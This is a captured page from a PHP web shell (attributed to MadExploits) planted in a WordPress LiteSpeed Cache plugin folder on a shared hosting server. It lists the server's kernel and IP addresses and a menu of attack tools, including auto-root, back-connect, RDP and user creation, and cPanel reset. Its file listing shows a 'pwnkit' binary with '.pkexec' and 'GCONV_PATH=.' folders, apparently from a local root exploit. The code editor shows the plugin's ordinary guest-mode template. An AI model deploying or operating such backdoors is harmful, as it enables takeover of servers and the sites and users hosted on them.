Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 3.145.80.198
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
temmmp /
anonmags.com /
wp-content /
plugins /
litespeed-cache /
tpl /
general /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
entry.tpl.php
1.11
KB
-rw-r--r--
network_settings.tpl.php
1.01
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
settings.tpl.php
11.2
KB
-rw-r--r--
settings_inc.auto_upgrade.tpl....
477
B
-rw-r--r--
settings_inc.guest.tpl.php
1.86
KB
-rw-r--r--
settings_tuning.tpl.php
1.32
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : settings_inc.guest.tpl.php
<?php namespace LiteSpeed; defined( 'WPINC' ) || exit; $guest_update_url = parse_url( LSWCP_PLUGIN_URL . GUI::PHP_GUEST, PHP_URL_PATH ); ?> <tr> <th> <?php $id = Base::O_GUEST; ?> <?php $this->title( $id ); ?> </th> <td> <?php $this->build_switch( $id ); ?> <div class="litespeed-desc"> <?php echo __( 'Guest Mode provides an always cacheable landing page for an automated guest\'s first time visit, and then attempts to update cache varies via AJAX.', 'litespeed-cache' ); ?> <?php echo __( 'This option can help to correct the cache vary for certain advanced mobile or tablet visitors.', 'litespeed-cache' ); ?> <?php Doc::learn_more( 'https://docs.litespeedtech.com/lscache/lscwp/general/#guest-mode' ); ?> <br /><?php Doc::notice_htaccess(); ?> <br /><?php Doc::crawler_affected(); ?> </div> <?php if ( $this->conf( $id ) ) : ?> <div class="litespeed-desc"> <?php echo __( 'Guest Mode testing result', 'litespeed-cache' ); ?>: <font id='litespeed_gm_status'><?php echo __( 'Testing', 'litespeed-cache' ); ?>...</font> </div> <script> (function ($) { jQuery(document).ready(function () { $.post( '<?php echo $guest_update_url; ?>', function(data){ if ( data == '[]' || $data == '{"reload":"yes"}' ) { $('#litespeed_gm_status').html('<font class="litespeed-success"><?php echo __( 'Guest Mode passed testing.', 'litespeed-cache' ); ?></font>'); } else { $('#litespeed_gm_status').html('<font class="litespeed-danger"><?php echo __( 'Guest Mode failed to test.', 'litespeed-cache' ); ?></font>'); } }).fail( function(){ $('#litespeed_gm_status').html('<font class="litespeed-danger"><?php echo __( 'Guest Mode failed to test.', 'litespeed-cache' ); ?></font>'); }) }); })(jQuery); </script> <?php endif; ?> </td> </tr>
Close